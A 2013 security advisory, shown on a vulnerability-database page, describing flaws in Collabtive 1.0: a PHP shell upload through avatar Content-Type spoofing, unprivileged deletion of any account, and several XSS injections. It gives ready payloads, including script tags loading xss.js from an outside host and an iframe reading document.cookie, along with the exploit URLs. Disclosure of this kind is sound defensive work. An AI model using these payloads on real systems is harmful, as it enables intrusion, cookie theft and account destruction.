Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Collabtive 1.0 XSS / Shell Upload / Privilege Escalation

🗓️ 22 Jul 2013 00:00:00Reported by Enrico CinquiniType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 33 Views

Security vulnerabilities in Collabtive 1.

Code
`=============================================  
- Release date: July 22th, 2013  
- Discovered by: Enrico Cinquini  
- Severity: High  
=============================================  
  
I. VULNERABILITY  
-------------------------  
  
Collabtive multiple vulnerabilities.  
  
  
II. INTRODUCTION  
-------------------------  
  
The last version of Collabtive (1.0) is affected by multiple  
vulnerabilities.  
  
  
IV. DESCRIPTION  
-------------------------  
  
1) UPLOAD PHP FILE INSIDE AVATAR:  
  
In the following function:  
  
https://hostname/secprj/manageuser.php?action=edit  
  
it's possible to upload a php file inside avatar by modifying the  
Content-Type  
as following:  
  
Content-Type: image/jpeg  
  
The file will be uploaded inside the standard directory and encoded with a  
six-characters number at the end of the file, like the following example:  
  
https://hostname/secprj/files/standard/avatar/uploadedshell_104185.php  
  
It's really fast to enumerate all the possibility and to execute the file  
uploaded.  
  
This vulnerability was identified in older releases, but it's still present.  
  
  
  
2) ACCOUNT DELETION  
  
It's possible to delete any account from every user, by calling the  
following URL:  
  
https://hostname/secprj/manageuser.php?action=del&id=5  
  
By setting the value "del" to parameter "action", the account with setted  
ID will be  
deleted, even if will apper an error message.  
  
An "User" account with no privilege can delete all kind of account,  
including Administrators.  
  
  
  
3) CROSS SITE SCRITPING - CHAT:  
  
The application is vulnerable to XSS attack in the managechat.php page. The  
parameter affected is 'userto':  
  
https://hostname/secprj/managechat.php?userto=<SCRIPT/XSS SRC="  
http://ha.ckers.org/xss.js"></SCRIPT>&uid=2  
  
  
  
4) CROSS SITE SCRITPING - TIMETRACKER  
  
The page managetimetracker.php is affected by Cross Site Scripting  
vulnerability.  
The POST parameters 'start' and 'end' are vulnerable, for example, to the  
following XSS:  
  
"><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>  
  
  
  
5) CROSS SITE SCRITPING - Multiple vulnerabilities:  
  
The application is vulnerable to XSS attack in different pages:  
  
manageproject.php  
managemilestone.php  
managetask.php  
managemessage.php  
  
To exploit the vulnerability it's necessary to set a new object name  
(project, milestone,  
task, message) like the following example:  
  
"><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>  
  
the script will be executed in the same page, and in dashboard,too.  
  
  
  
6) CROSS SITE SCRITPING - PROFILE  
  
The page manageuser.php?action=editform is affected by Cross Site Scripting  
vulnerability.  
All the profile fields are vulnerable, for example, to the following  
injection:  
  
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>  
  
  
VI. BUSINESS IMPACT  
-------------------------  
  
An attacker could upload malicious file, delete accounts and perform XSS  
attacks.  
  
  
VII. SYSTEMS AFFECTED  
-------------------------  
  
Version 1.0 is vulnerable.  
  
  
VIII. SOLUTION  
-------------------------  
  
It's necessary to:  
  
- implement a strong upload filter to prevent the upload of malicious file  
  
- implement an input validation mechanism to avoid being vulnerable to XSS  
injection  
  
- review and correct users profiling to prevent a user can delete other  
accounts  
  
  
IX. REFERENCES  
-------------------------  
  
Collabtive website:  
  
http://collabtive.o-dyn.de  
  
  
X. CREDITS  
-------------------------  
  
The vulnerability has been discovered by:  
  
Enrico Cinquini enrico(dot)cinquini(at)gmail(dot)com  
  
  
XI. VULNERABILITY HISTORY  
-------------------------  
  
June 20th, 2013: Vulnerability identification  
June 21th, 2013: Vendor notification  
July 22th, 2013: Vulnerability disclosure  
  
  
XII. LEGAL NOTICES  
-------------------------  
  
The information contained within this advisory is supplied "as-is" with no  
warranties or guarantees of fitness of use or otherwise. We accept no  
responsibility for any damage caused by the use or misuse  
of this information.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Jul 2013 00:00Current
0.6Low risk
Vulners AI Score0.6
xssshell uploadprivilege escalationaccount deletioncross site scriptingupload filterinput validationuser profiling
33